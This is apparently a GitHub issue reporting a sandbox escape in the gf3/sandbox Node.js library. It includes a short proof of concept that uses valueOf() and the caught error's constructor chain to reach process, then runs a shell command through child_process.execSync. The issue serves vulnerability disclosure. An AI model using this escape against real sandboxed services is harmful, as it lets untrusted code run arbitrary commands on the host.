gf3 / sandbox

A nifty JavaScript sandbox for Node.js
ISC License
844 stars 123 forks source link

Sandbox Escape Bug #70

Open seongil-wi opened 1 year ago

seongil-wi commented 1 year ago
var Sandbox = require("sandbox")
var code = `
    try{ 
        valueOf()
    } catch(pp){
        pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag'); 
    }
`

s = new Sandbox()
s.run(code)

We found a sandbox escaping bug. This bug can be triggered by calling valueOf() function. Also, we can execute arbitrary shell code using the process module.